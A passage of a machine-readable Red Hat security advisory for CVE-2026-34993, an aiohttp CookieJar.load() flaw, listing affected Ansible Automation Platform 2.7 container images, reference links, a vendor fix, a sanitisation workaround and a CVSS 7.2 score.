"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-34993"
},
{
"category": "external",
"summary": "RHBZ#2484099",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484099"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-34993",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34993"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-34993",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34993"
},
{
"category": "external",
"summary": "https://github.com/aio-libs/aiohttp/commit/dcf40f30637e8752c76781cf6703b5a236749a00",
"url": "https://github.com/aio-libs/aiohttp/commit/dcf40f30637e8752c76781cf6703b5a236749a00"
},
{
"category": "external",
"summary": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-jg22-mg44-37j8",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-jg22-mg44-37j8"
}
],
"release_date": "2026-06-02T18:29:15.847000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:38:09+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50340"
},
{
"category": "workaround",
"details": "Applications using AIOHTTP that are configured to load untrusted files via the `CookieJar.load()` function should implement input sanitization prior to loading. This prevents the injection of malicious code.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
